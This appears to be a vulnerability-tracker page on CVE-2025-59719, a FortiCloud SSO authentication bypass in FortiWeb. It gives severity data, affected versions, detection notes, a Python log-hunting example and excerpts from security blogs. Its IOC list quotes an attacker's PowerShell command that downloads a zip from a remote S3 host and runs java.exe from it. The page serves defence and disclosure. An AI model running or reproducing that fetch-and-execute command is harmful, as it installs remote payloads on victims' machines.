CVE-2025-59719
Published: 2025-12-09
Priority: P191 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · VulnCheck KEV
Exploited in the wild
EPSS: 23.67% (97.5th percentile)
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | forticloud | — | — |
| fortinet | fortinet | — | — |
| fortinet | fortios | — | — |
| fortinet | fortiproxy | — | — |
| fortinet | fortiswitchmanager | — | — |
| fortinet | fortiweb | — | — |
| fortinet | fortiweb | — | — |
| fortinet | fortiweb | 7.4.0 – 7.4.9 | — |
| fortinet | fortiweb | 7.6.0 – 7.6.4 | — |
Detection & IOCs (extracted from sources)
Command: Invoke-WebRequest -Uri 'hxxps://fastdlvrss[.]s3[.]us-east-1[.]amazonaws[.]com/paswr.zip' -OutFile 'C:\programdata\usoshared\Sysdmupd.zip'; Expand-Archive -Path 'C:\programdata\usoshared\Sysdmupd.zip' -DestinationPath 'c:\programdata\usoshared\' -Force; Remove-Item 'C:\programdata\usoshared\Sysdmupd.zip'; cmd /c 'c:\programdata\usoshared\java.exe';
- Look for FortiGate event log logid='0100044547' showing local admin account creation (e.g., 'secadmin') by [email protected] — indicates post-exploitation persistence.
- Exploitation is only possible when FortiCloud SSO is enabled; check for 'admin-forticloud-sso-login' setting. The feature activates automatically when devices are registered via FortiCare UI.
- After SSO authentication, attackers download full device configuration using 'show full-configuration' — monitor for this command in FortiGate CLI/audit logs.
- Attacks are highly automated — exploitation and config exfiltration occur within seconds of initial access. Correlate rapid sequential events: SSO login → admin account creation → config download.
- Monitor for creation of local admin accounts named 'audit', 'backup', 'itadmin', 'secadmin', or 'support' on FortiGate devices — these are attacker-created persistence accounts.
- Attacker-controlled rogue workstations joined to AD domain — hunt for unexpected machine account creation, especially names WIN-X8WRBOSK0OF, WIN-YRSXLEONJY2, WIN-1J7L3SQSTMS.
- Monitor for a FortiGate process named 'fortidcagent' being abused or unusual activity associated with it during post-exploitation lateral movement.
- Attacker used 'ssl-admin' VPN account for post-exploitation access — audit VPN user accounts for unexpected entries like 'ssl-admin'.
- Shadowserver is tracking ~11,000 internet-exposed Fortinet devices with FortiCloud SSO enabled — use Shadowserver data to identify exposed assets in your network.
- CVE-2025-59719 only affects FortiWeb; it is NOT exploitable unless FortiCloud SSO is enabled. FortiCloud SSO is not enabled by default but activates automatically when devices are registered via the FortiCare UI.
- Third-party SAML IdPs and FortiAuthenticator are NOT impacted by this issue — only FortiCloud SSO is affected.
- The initial patch (FortiOS 7.4.9) did not fully address the authentication bypass; a patch bypass was observed in the wild against fully patched devices. FortiOS 7.4.11, 7.6.6, and 8.0.0 were planned to fully remediate.
- Attacker SSO login accounts ([email protected], [email protected]) and observed IP addresses may change as Fortinet takes action to neutralize them.
- Affected FortiWeb versions: 8.0.0, 7.6.0–7.6.4, 7.4.0–7.4.9. FortiWeb 7.0 and 7.2 are NOT affected by CVE-2025-59719.
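An added example, not taken from any of the cited sources: Python that runs the hunt described in the list above (SSO login → admin account creation → config download within seconds, plus the named persistence accounts) over constructed FortiGate-style key=value log lines. Only the logid and the account names come from this page; the field names (devname, method, status, cfgpath, cfgobj, action, msg), the 60-second window and every sample value are assumptions.

```python
import re
from datetime import datetime, timedelta

ADMIN_CREATE_LOGID = "0100044547"   # from the page: local admin account creation
SUSPECT_ADMIN_NAMES = {"audit", "backup", "itadmin", "secadmin", "support"}  # from the page
WINDOW = timedelta(seconds=60)      # assumption: "within seconds" taken as <= 60 s

# Constructed sample events (simplified, not captured from a real device).
SAMPLE_LOGS = """\
date=2026-01-20 time=03:14:07 devname="fw-edge-01" user="cloud-user@example.invalid" ui="sso(203.0.113.10)" method="sso" action="login" status="success" msg="Administrator logged in"
date=2026-01-20 time=03:14:09 devname="fw-edge-01" logid="0100044547" user="cloud-user@example.invalid" cfgpath="system.admin" cfgobj="secadmin" action="Add" msg="Add system.admin secadmin"
date=2026-01-20 time=03:14:12 devname="fw-edge-01" user="cloud-user@example.invalid" action="exec" msg="show full-configuration"
date=2026-01-20 time=09:00:00 devname="fw-branch-02" logid="0100044547" user="admin" cfgpath="system.admin" cfgobj="netops" action="Add" msg="Add system.admin netops"
date=2026-01-20 time=09:05:00 devname="fw-branch-02" logid="0100044547" user="admin" cfgpath="system.admin" cfgobj="backup" action="Add" msg="Add system.admin backup"
date=2026-01-20 time=10:00:00 devname="fw-branch-02" user="ops@example.invalid" ui="sso(198.51.100.7)" method="sso" action="login" status="success" msg="Administrator logged in"
date=2026-01-20 time=10:45:00 devname="fw-branch-02" user="ops@example.invalid" action="download" msg="System config file downloaded"
"""

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Turn one key=value log line into a dict with a parsed 'ts' timestamp."""
    ev = {k: (quoted if quoted else bare) for k, quoted, bare in KV_RE.findall(line)}
    ev["ts"] = datetime.strptime(f'{ev["date"]} {ev["time"]}', "%Y-%m-%d %H:%M:%S")
    return ev


def classify(ev):
    """Map an event to one stage of the chain, or None if it is unrelated."""
    if (ev.get("method"), ev.get("action"), ev.get("status")) == ("sso", "login", "success"):
        return "sso_login"
    if (ev.get("logid") == ADMIN_CREATE_LOGID and ev.get("cfgpath") == "system.admin"
            and ev.get("action") == "Add"):
        return "admin_create"
    if "show full-configuration" in ev.get("msg", "") or ev.get("action") == "download":
        return "config_export"
    return None


def hunt(lines, window=WINDOW):
    """Return (device, rule, detail) findings in event order."""
    findings, last_sso, chain = [], {}, {}
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    for ev in events:
        kind, dev = classify(ev), ev.get("devname", "?")
        if kind is None:
            continue
        if kind == "sso_login":
            last_sso[dev], chain[dev] = ev, set()   # start a new chain per device
            continue
        # Rule 1: a known persistence account name is worth a look on its own.
        if kind == "admin_create" and ev.get("cfgobj", "").lower() in SUSPECT_ADMIN_NAMES:
            findings.append((dev, "suspect_admin_name", ev["cfgobj"]))
        # Rule 2: same SSO user creates an admin AND exports config inside the window.
        sso = last_sso.get(dev)
        if (sso and ev["ts"] - sso["ts"] <= window
                and ev.get("user") == sso.get("user") and kind not in chain[dev]):
            chain[dev].add(kind)
            if len(chain[dev]) == 2:
                findings.append((dev, "sso_chain", sso["user"]))
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOGS.splitlines()):
        print(finding)
```

The slow SSO session on the second device (config download 45 minutes after login) is not reported as a chain; only the account name rule fires there.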
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.8 CRITICAL
cisa · 9.8 CRITICAL
CISA
Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
cisa·2025-12-16·CVSS 9.8
CVE-2025-59718 [CRITICAL] CWE-347 Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
Vulnerability: Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
Affected: Fortinet Multiple Products
Fortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb contain an improper verification of cryptographic signature vulnerability that may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message. Please be aware that CVE-2025-59719 pertains to the same problem and is mentioned in the same vendor advisory. Ensure to apply all patches mentioned in the advisory.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://fortiguard.fortinet.com/psirt/FG-I
Fortinet
Multiple Fortinet Products' FortiCloud SSO Login Authentication Bypass
vendor_fortinet·2025-12-09·CVSS 9.8
CVE-2025-59718 [CRITICAL] CWE-347 Multiple Fortinet Products' FortiCloud SSO Login Authentication Bypass
FG-IR-25-647: Multiple Fortinet Products' FortiCloud SSO Login Authentication Bypass
An improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0.0 through 7.0.21, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated atta
GHSA
GHSA-chq4-235q-jp7w: An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8
ghsa_unreviewed·2025-12-09
CVE-2025-59719 [CRITICAL] CWE-347 GHSA-chq4-235q-jp7w: An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
VulnCheck
Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
vulncheck·2025·CVSS 9.8
CVE-2025-59718 [CRITICAL] CWE-347 Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
Fortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb contain an improper verification of cryptographic signature vulnerability that may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message. Please be aware that CVE-2025-59719 pertains to the same problem and is mentioned in the same vendor advisory. Ensure to apply all patches mentioned in the advisory.
Affected: Fortinet Multiple Products
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://arcticwolf.com/resources/blog/
VulnCheck
Fortinet FortiWeb Improper Verification of Cryptographic Signature
vulncheck·2025·CVSS 9.8
CVE-2025-59719 [CRITICAL] Fortinet FortiWeb Improper Verification of Cryptographic Signature
Fortinet FortiWeb Improper Verification of Cryptographic Signature
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
Affected: Fortinet FortiWeb
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719/; https://www.linkedin.com/posts/drayagha_for-the-latest-fortigate-cves-cve-2025-59718-activity-740721435622628
No detection rules found.
No public exploits indexed.
Hackernews
⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
blogs_hackernews·2026-06-22·CVSS 9.8
CVE-2026-24858 [CRITICAL] ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
## ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
It’s Monday again.
This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control.
The annoying part is how little of this feels new. Weak credentials, sketchy downloads, browser extensions with too much access, and WordPress sites are used to push more attacks. Nothing clever. Just sloppy, cheap, and effective.
Here’s the Monday recap. Let’s get into the week’s mess.
## ⚡ Threat of the We
Tenable
Operation Epic Fury: Why exposure data changes everything about Iran's cyber-kinetic campaign
blogs_tenable·2026-03-17
Operation Epic Fury: Why exposure data changes everything about Iran's cyber-kinetic campaign
Tenable
Operation Epic Fury: cyber threat data in the Iran War
blogs_tenable·2026-03-17·CVSS 7.8
[HIGH] Operation Epic Fury: cyber threat data in the Iran War
# Operation Epic Fury: Why exposure data changes everything about Iran's cyber-kinetic campaign
Robert Huber
March 17, 2026
13 Min Read
Iran's retaliatory campaign following Operation Epic Fury has collapsed the boundary between physical and digital warfare. Tenable's exposure data analysis across seven target countries reveals that the largest exploitable attack surface isn't the headline threat, it's a Microsoft Word N-day affecting nearly 14 million assets.
## Key takeaways:
1. Exposure data rebalances the threat picture. A Microsoft Word N-day (CVE-2026-21514) accounts for nearly 14 million of the 15.5 million affected assets across the seven target countries, two orders of magnitude more than the conflict's headline threats. Organizations
Sentinelone
FortiGate Edge Intrusions | Stolen Service Accounts Lead to Rogue Workstations and Deep AD Compromise
blogs_sentinelone·2026-03-10
FortiGate Edge Intrusions | Stolen Service Accounts Lead to Rogue Workstations and Deep AD Compromise
## Overview
Throughout early 2026, SentinelOne’s® Digital Forensics & Incident Response (DFIR) team has responded to several incidents where FortiGate Next-Generation Firewall (NGFW) appliances have been compromised to establish a foothold into the targeted environment. Each incident was detected and stopped during the lateral movement phase of the attack.
Fortinet has disclosed and issued patches for several high-severity vulnerabilities allowing unauthorized access during the activity period of our investigations. Successful exploitation of these flaws allows an attacker to extract the configuration file from the FortiGate appliance, which frequently contains service account credentials and valuable network topology information for the targeted environment.
We observed a consistent t
Checkpoint
26th January – Threat Intelligence Report
blogs_checkpoint·2026-01-26
CVE-2025-68143 26th January – Threat Intelligence Report
## 26th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 26th January, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
RansomHub ransomware group has claimed responsibility for a cyber-attack on Luxshare, an electronics manufacturer of Apple, Nvidia, LG, Tesla, and others. The threat actors claimed access to 3D CAD models, circuit board designs, and engineering documentation. The company has not yet confirmed the breach.
Check Point Threa
Bleepingcomputer
Hackers breach Fortinet FortiGate devices, steal firewall configs
blogs_bleepingcomputer·2026-01-22·CVSS 9.8
[CRITICAL] Hackers breach Fortinet FortiGate devices, steal firewall configs
## Hackers breach Fortinet FortiGate devices, steal firewall configs
## Sergiu Gatlan
Fortinet FortiGate devices are being targeted in automated attacks that create rogue accounts and steal firewall configuration data, according to cybersecurity company Arctic Wolf.
The campaign started last week, on January 15, with the attackers exploiting an unknown vulnerability in the devices' single sign-on (SSO) feature to create accounts with VPN access and exporting firewall configurations within seconds, indicating automated activity.
Arctic Wolf, which reported these incidents on Wednesday, says the attacks are very similar to incidents it documented in December following the disclosure of a critical authentication bypass vulnerability (CVE-2025-59718) in Fortinet products.
That flaw allow
Fortinet
Analysis of Single Sign-On Abuse on FortiOS | Fortinet Blog
blogs_fortinet·2026-01-22·CVSS 9.8
[CRITICAL] Analysis of Single Sign-On Abuse on FortiOS | Fortinet Blog
PSIRT BLOGS
Analysis of Single Sign-On Abuse on FortiOS
By Carl Windsor | January 22, 2026
Incident Updates:
January 23: Fortinet disabled FortiCloud accounts that were being abused as part of the attack.
January 26: Fortinet disabled FortiCloud SSO to prevent abuse.
January 27: Fortinet issued Public Advisory
January 27: FortiCloud SSO access restored; however, it will no longer support access from vulnerable devices. Please follow the upgrade advice specified in the Public Advisory.
January 28: Confirmed that third-party SAML IdPs and FortiAuthenticator are not impacted by this issue. Blog text below has been amended accordingly.
January 30: Fortinet updated the Public Advisory with the last of the release updates.
In December 2025, Fortinet issued an advisory related to two For
Wiz
Crying Out Cloud Monthly Newsletter - January 2026 | Wiz
blogs_wiz·2026-01-22·CVSS 8.7
CVE-2025-55182 [HIGH] Crying Out Cloud Monthly Newsletter - January 2026 | Wiz
Welcome back! In this edition, we bring you the latest in cloud security: noteworthy incidents, exclusive data, and crucial vulnerabilities. Let’s jump in.
## 🔍 Highlights
React2Shell: Critical RCE Vulnerability in React and Next.js
React2Shell (CVE-2025-55182) is a critical, unauthenticated remote code execution vulnerability rooted in insecure deserialization within the React Server Components (RSC) “Flight” protocol, impacting React 19 and RSC-enabled frameworks, most notably Next.js. The flaw affects default configurations, meaning standard production deployments can be exploited with a single crafted HTTP request and no developer misconfiguration, with exploitation demonstrating near-100% reliability.
Since early December 2025, exploitation has been observed in the wild by multipl
Checkpoint
22nd December – Threat Intelligence Report
blogs_checkpoint·2025-12-22
CVE-2025-37164 22nd December – Threat Intelligence Report
## 22nd December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 22nd December, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
An adult content platform PornHub has disclosed a data breach linked to analytics provider Mixpanel. The breach exposed more than 200 million records related to Premium users, including email addresses, search, watch, and download histories, locations, and associated video details collected prior to 2021. Pornhub stated
Bleepingcomputer
Over 25,000 FortiCloud SSO devices exposed to remote attacks
blogs_bleepingcomputer·2025-12-19·CVSS 9.8
CVE-2025-59718 [CRITICAL] Over 25,000 FortiCloud SSO devices exposed to remote attacks
## Over 25,000 FortiCloud SSO devices exposed to remote attacks
## Sergiu Gatlan
Internet security watchdog Shadowserver has found over 25,000 Fortinet devices exposed online with FortiCloud SSO enabled, amid ongoing attacks targeting a critical authentication bypass vulnerability.
Fortinet noted on December 9th, when it patched the security flaw tracked as CVE-2025-59718 (FortiOS, FortiProxy, FortiSwitchManager) and CVE-2025-59719 (FortiWeb), that the vulnerable FortiCloud SSO login feature is not enabled until admins register the device with the company's FortiCare support service.
As cybersecurity company Arctic Wolf reported on Monday, the vulnerability is now actively exploited to compromise admin accounts via malicious single sign-on (SSO) logins.
Threat actors are abusing it i
Talos
Adios 2025, you won’t be missed
blogs_talos·2025-12-18
Adios 2025, you won’t be missed
Welcome to this week’s edition of the Threat Source newsletter.
For us in America, we’re in the holiday doldrums and things slow and/or shut down until the new year. At Cisco, we shut down the last week of the year to reset and recharge, and I’ve grown to be quite fond of it. I’ve worked plenty of gigs where there were no holiday breaks, and now that I’m living that dream, I gotta tell ya, it’s a damn civilized way to live if you can get it.
It’s only natural for us to think on 2025 — what happened to us, what made the news, and with some trepidation (and maybe some hope) what lies in store for 2026.
I thought I’d summarize the notable things that come to mind for me:
1. Uncovering Qilin attack methods exposed through multiple cases
Why this one? Qilin is one of the more aggressive ca
Bleepingcomputer
Hackers exploit newly patched Fortinet auth bypass flaws
blogs_bleepingcomputer·2025-12-16·CVSS 9.8
CVE-2025-59718 [CRITICAL] Hackers exploit newly patched Fortinet auth bypass flaws
## Hackers exploit newly patched Fortinet auth bypass flaws
## Bill Toulas
Hackers are exploiting critical-severity vulnerabilities affecting multiple Fortinet products to get unauthorized access to admin accounts and steal system configuration files.
The two vulnerabilities are tracked as CVE-2025-59718 and CVE-2025-59719, and Fortinet warned in an advisory on December 9 about the potential for exploitation.
CVE-2025-59718 is a FortiCloud SSO authentication bypass affecting FortiOS, FortiProxy, and FortiSwitchManager. It is caused by improper verification of cryptographic signatures in SAML messages, allowing an attacker to log in without valid authentication by submitting a maliciously crafted SAML assertion.
CVE-2025-59719 is a FortiCloud SSO authentication bypass affecting FortiWe
Bleepingcomputer
Fortinet warns of critical FortiCloud SSO login auth bypass flaws
blogs_bleepingcomputer·2025-12-09·CVSS 9.8
CVE-2025-59718 [CRITICAL] Fortinet warns of critical FortiCloud SSO login auth bypass flaws
## Fortinet warns of critical FortiCloud SSO login auth bypass flaws
## Sergiu Gatlan
Fortinet has released security updates to address two critical vulnerabilities in FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager that could allow attackers to bypass FortiCloud SSO authentication.
Threat actors can exploit the two security flaws tracked as CVE-2025-59718 (FortiOS, FortiProxy, FortiSwitchManager) and CVE-2025-59719 (FortiWeb) by abusing improper verification of cryptographic signature weaknesses in vulnerable products via a maliciously crafted SAML message.
However, as Fortinet explained in an advisory published today, the vulnerable FortiCloud feature is not enabled by default when the device is not FortiCare-registered.
"Please note that the FortiCloud SSO login feature is no
Recorded Future
December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
blogs_recorded_future·CVSS 7.8
CVE-2025-55182 [HIGH] December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
# December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.
What security teams need to know:
- React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
- China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
- Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-conce
Wiz
CVE-2025-59719 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-59719 [CRITICAL] CVE-2025-59719 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59719: Fortinet FortiWeb vulnerability analysis and mitigation
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
Source: NVD
Score: 9.8
Published: December 9, 2025
Severity: CRITICAL
CNA Score: 9.8
Affected Technologies: Fortinet FortiWeb
Has Public Exploit: Yes
Has CISA KEV Exploit: No
CISA KEV Release Date: N/A
CISA KEV Due Date: N/A
Exploitation Probability Percentile (EPSS): 27.8
Exploitation Probability (EPSS): 0.1
Affected packages and libraries
cpe:2.3:a:fortinet:fortiweb
Sources
Linux Severity CRITICAL Has Fix Added at: Dec 10, 20
Published: 2025-12-09
Exploited in the wild